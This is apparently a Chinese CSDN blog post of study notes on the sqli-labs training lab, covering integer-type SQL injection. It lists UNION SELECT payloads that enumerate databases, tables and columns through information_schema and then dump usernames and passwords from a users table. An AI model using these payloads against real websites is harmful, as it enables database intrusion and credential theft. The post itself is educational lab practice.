sqli-labs笔记(1)整型注入

最新推荐文章于 2023-12-27 15:55:31 发布
最新推荐文章于 2023-12-27 15:55:31 发布
阅读量192 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43798683/article/details/105660919
版权
这篇博客主要介绍了SQL注入中的整型注入,重点在sqli-labs的lesson 1。内容包括理解MySQL的information_schema数据库,以及通过查询不同表获取数据库信息。通过示例解释了如何进行不报错的联合查询,确定列数,并利用group_concat()函数拼接查询结果。还展示了如何查询当前数据库的表名、users表的字段以及用concat_ws拼接username和password。
摘要由CSDN通过智能技术生成

在这里插入图片描述

lesson 1 整型注入

熟悉mysql 中的默认数据库information_schema

  • shecmata 表 :所有数据库
    在这里插入图片描述
  • tables 表 :所有表
    在这里插入图片描述
  • columns表:所有的字段
    在这里插入图片描述

语句解释(sqli-labs less-2)

  • ?id=1union select 1,2,3,...n # 不报错,确定union 查询前后列数一致(1,2,3只是占位)与?id=1 order by 4 # 效果相同
  • ?id=9999 union select 1, group_concat(schema_name) ,3 from information_schema.schemata #
    查询所有库,group_concat() 将查询内容拼接
    在这里插入图片描述
  • ?id=9999 union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema = database()# 查询当前数据库下的表的名字
    在这里插入图片描述
  • ?id=9999 union select 1, group_concat(column_name) ,3 from information_schema.columns where table_schema = database() and table_name = "user"# 查询当前数据库中users表的column字段
    在这里插入图片描述
  • ?id=9999 union select 1, group_concat(concat_ws(":",username,password) ),3 from users # 查询user表中的username,password ,concat_ws(":",username,password)表示以:拼接username和password
    在这里插入图片描述
最正经的上班族
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 669
继续学习sqli-labs,本篇是less 32-37
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4404
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
SQLi-LABS(笔记)Page-1(Basic Challenges)
weixin_57536426的博客
12-27 1096
关于SQLi-LABS的靶场环境以及SQL注入天书都放在阿里云盘中,需要环境的自取链接:https://www.alipan.com/s/m5AP2eSezDV 提取码: 2x4u个人笔记只做到1-16,SQL注入天书有后续内容。
基于Sqli-Labs靶场的SQL注入-54~65关
Joker
01-12 494
主要讲最后几关的通关方法。
sqli-labs(全通关刷题笔记)
读万卷书,行万里路。
01-15 2405
文章目录1 准备工作2 基础挑战(1-20)less-1less-2less-3less-4less-5报错注入布尔注入延时注入less-6less-7less-8less-9less-10Hackbarless-11less-12less-14less-15less-16less-17less-18less-19less-203 高级注入(21-37)less-21less-22less-23less-24less-25less-26less-26aless-27less-27aless-28less-2
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 728
继续学习sqli-labs,本篇是less17
Sqli-lab注入靶场 1-10笔记
m0_59343440的博客
01-17 2386
通关大致思路: 1.判断注入点 2.通过报错信息知道如何闭合参数 3.猜字段数及其回显 4.构造语句获取想要的信息 Less1GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) url中添加get参数?id=1,即 http://127.0.0.1/sqli-labs-master/Less-1/?id=1进入注入页面。 判断是否有注入点 先输入and 1=1 and 1=2代判断是否是整型注入(因为and 1=1与..
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1290
这也是我刚开始学手工注入笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
sqli-labs学习笔记
shayebudon的博客
10-06 1797
简单的SQL注入 选择:2017 A1 Extract Data-User info 在登录界面就可以使用SQL语句,以此来检查下平台是否搭建成功 用户名框输入一个“\”,点击确认键,可以看到报错信息,并且可以看到SQL语句,说明存在SQL注入,此处无过滤。 可以通过查看报错信息中的SQL语句,选择进行SQL注入的方式,这里可以看到这样的一行: 那么,选择在用户名输入处输入“‘ or 1=1 #”,通过使用“or”字句将输入匹配取消,并使用“#”将后续语句中对passwo...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
git教程【源码管理系统教程及版本管理功能教程】
08-13
git是一种源码管理系统(source code management,缩写为SCM)。它对当前文件提供版本管理功能,核心思想是对当前文件建立一个对象数据库(object database),将历史版本信息存放在这个数据库中。 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
财务收入支出系统
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
某智能工厂数字化化集成落地项目.pptx
08-13
某智能工厂数字化化集成落地项目.pptx
某流域水生态治理建设项目智慧管理工程可行性研究报告
最新发布
08-13
某流域水生态治理建设项目智慧管理工程可行性研究报告,内容包括: 1、统一物联感知平台 ,实现流域智能视频工业电视系统的有效覆盖,按照实用与先进并存的原则,并兼顾考虑与环保局、气象局以及水利部、省建点位的有效结合,在重点位、市管河流交汇处进行补充设置。 2、江流域智慧管理平台 注重应用开发与业务管理相融合,加强信息应用在河道规划、景观设计、防污控制、日常监管等业务工作中的应用,不断提高智慧管理与服务的应用实效。本期项目设计水安全、水资源、水环境、水生态、通航管理、公众服务、闸坝智能调水、水管理创新等。 3、统一时空信息服务平台 统一数据服务平台建设市统一大数据服务平台,对现有各业务数据进行整合基础。包括数据汇聚平台、分布式数据计算与存储、数据治理平台、数据资源管理平台,构建水务大数据湖,实现数据资源的统一管理和服务。 4、统一应用平台 实现对水务局现有系统进行整合,并搭建智慧水务统一应用平台框架。在统一整理市水务局现有业务系统的基础上,实现统一用户管理、单点登录智慧水务系统、智慧河道系统、综合保障系统、水资源管理系统、供排水管理系统、水利水保管理系统、河湖管理系统等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值